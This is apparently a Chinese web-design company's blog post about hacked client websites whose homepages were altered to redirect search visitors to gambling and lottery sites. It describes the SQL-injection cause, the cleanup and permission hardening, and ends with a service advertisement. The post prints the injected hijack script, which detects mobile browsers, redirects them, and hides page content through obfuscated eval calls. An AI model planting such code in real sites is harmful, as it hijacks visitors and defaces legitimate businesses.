如何解决网站首页被黑客非法篡改?网站被黑提醒该站点可能受到黑客
网站建设 全景制作 微信小程序开发 微信公众号开发 VR全景网站开发 网络推广 网站托管 全网营销 咨询留言 更多资讯 Keyword Tags pv:0
大清早的一上班收到3个网站客户的QQ联系,说是自己公司的网站被跳转到了北京sai车,cai票,du博网站上去了,我们锦程网络公司对3个网站进行了详细的安全检测,发现这3个客户的网站都是同样的症状,网站首页文件index.php,index.html都被篡改添加了恶意的代码。网站在百度的快照也被更改成了这些cai票,bo彩的内容了,并被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!如下图所示:

从百度点击网站进去,会直接跳转到bo彩,du博网站上去,直接输入3个公司的网站地址是不会跳转的,点击跳转的时候会被360拦截掉,提示如下图:

360安全中心提醒您:未经证实的bo彩du博网站,您访问的网站含有未经证实的境外bo彩或非法du博的相关内容,可能给您造成财产损失,请您谨慎访问。
我们锦程网络技术通过对3个客户网站的代码的安全分析,发现都被攻击者上传了网站木马后门,php大马,以及一句话木马后门都被上传到了客户网站的根目录下,网站的首页文件都被篡改了,包括网站的标题,描述,TDK都被改成了bo彩,cai票,du博的内容,客户说之前还原了网站首页文件,过不了多久还是被篡改,被跳转,导致客户网站在百度的权重直接降权,网站在百度的关键词排名都掉没了,损失惨重。网站被反复篡改的原因根本是网站代码存在漏洞,需要对网站漏洞进行修复,以及做好网站安全加固,清除木马后门才能彻底的解决问题。
我们来看下网站首页被篡改的症状:
title keywords deion都被篡改了,内容都是加密的字符:
北京赛车pk10 PK10开奖直播 北京赛车pڱ0开奖记录-pk10开奖视频直播

通过url解密发现这些内容都是北京sai车,北京pk10,pk10北京PK开奖等cai票的网站关键词,简单来讲就是网站的标题内容都被攻击者改成了cai票,bo彩的标题,利用网站自身在百度的权重,做他们自己的关键词排名。
网站被跳转的代码也被我们锦程网络技术找了出来,如下:
function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();
知道问题的所在,以及网站被攻击的症状,那么该如何解决问题?
首先登陆客户网站的服务器,打包压缩客户的网站代码下载到我们本地的工作电脑,对其进行详细的安全检测,以及网站漏洞检测,网站木马后门检测,以及网站日志下载分析,发现其中一个网站使用的是dedecms系统开发网站,网站存在sql注入漏洞,导致网站的管理员账号密码被sql注入获取到,默认的管理员后台地址dede没有改,导致攻击者直接登录后台上传了木马到网站里了。针对dedecms的sql注入漏洞进行了修复,清除掉网站存在的木马后门,对网站安全进行加固问题得以解决。
对dedecms的目录安全权限进行设置 /data目录取消脚本执行权限,给与写入权限,templets模板文件夹也是同样的安全部署,取消php脚本的执行权限,开启写入权限,dede后台的目录给只读权限,uploads上传目录给写入,取消php脚本权限。
至此客户网站首页被篡改的问题得以解决,百度的拦截也是需要去除的,清除恶意链接代码,修复网站漏洞,防止以后网站被篡改,做好网站安全后,再提交给百度安全中心人工审核,就可以解除百度的拦截,如果您对网站漏洞修复不熟悉的话,可以找我们锦程网络来修复网站漏洞,解决百度拦截。
- 1 做网站为什么要将网页HTML静态化?动态网页生成...
- 2 响应式网站有哪些优势?做网站用响应式布局的缺点又...
- 3 企业网站建设必须解决降低用户页面跳出率的几个步骤
- 4 网站建设公司如何做一份优秀的公司网站建设方案书
- 5 企业网站建设注意事项之做网站时用哪个语言开发网站...
- 6 公司想做企业网站,如何在搜索引擎上找到合适的网站...
- 7 网站建设公司告诉您怎样做网站才算一个好网站
- 8 做网站公司:如何让企业网站改版的影响降到最低
- 9 高端大气上档次的企业网站如何制作?分享高端网站制...
- 10 网站建设后期运营之如何提高网站开发后的网站转化率
- 11 网站开发公司:注意网站设计制作需求及正确方向
- 12 一个全面清晰的网站改版方案流程十分重要
- 13 当下流行的响应式网站制作的价值、重要性及响应式布...
- 14 定位企业网站的方向细节才能体现公司做网站成功与否
- 15 做网站SEO工作如何避免过度优化及搜索排名优化解...
- 16 企业网站做好之后需要怎样进行网站维护?网站维护有...
- 17 企业网站手机版移动网页设计中的七个注意事项
- 18 企业网站如何提升360搜索引擎网站权重?
- 19 网页设计图像设计颜色对照表
- 20 什么样的营销型网站才能为企业带来源源不断的客户咨...
- 21 怎样进行企业网站策划设计才能让企业网站拥有良好的...
- 22 高端网站建设的要素及注意事项有哪些?
- 23 搜索引擎关键字排名技巧之seo优化和竞价推广的区...
- 24 做企业网站为什么需要进行ICP备案?
- 25 中小企业网站建设完成之后如何选择网络推广网站优化...
- 26 公司想做网站,怎样找靠谱的企业网站建设公司?
- 27 企业网站建设有哪些操作步骤和做网站的注意事项?
- 28 为什么网页上的超级链接默认的颜色是蓝色?
- 29 2021年,网站设计师必须重视并掌握的10种网页...
- 30 企业网站建设制作的成本大概需要多少钱?
- 31 企业应该如何通过网络推广来运营自己的企业网站?
- 32 网站建设应该考虑哪些因素?什么情况会降低用户体验...
- 33 企业网站建设常见的6种网站类型,企业建站应该选择...
- 34 什么样的网站设计风格更加受欢迎?
- 35 应该如何针对不同类型的网站建设项目做网站建设策划...
- 36 各行各业都不同程度受到新冠疫情的冲击,后疫情时代...
- 37 正确使用网站tag标签对SEO网站排名优化有什么...
- 38 如何通过一家公司的网站设计细节识别潜在的商业风险...
- 39 互联网大平台化背景下,企业应该做自己的官方网站还...
- 40 论“网红企业”拥有一个公司官方网站的重要性
- 41 全民创业的互联网时代,企业网站还有必要做吗?
- 42 SEO优化和网站前端之间的关系是什么?
- 43 企业应该如何利用网络推广来扩大知名度?
- 44 网站SEO优化实施方案
- 45 企业网站建设项目中域名到底有多重要?
- 46 为什么传统门店更需要开发微信小程序?
- 47 网络营销主要做什么?企业为什么要开展网络营销?
- 48 企业网站运营包含哪些内容?
- 49 自适应网站制作与响应式网站建设到底哪个更好?
- 50 Dedecms防止恶意提交自定义表单设置必填项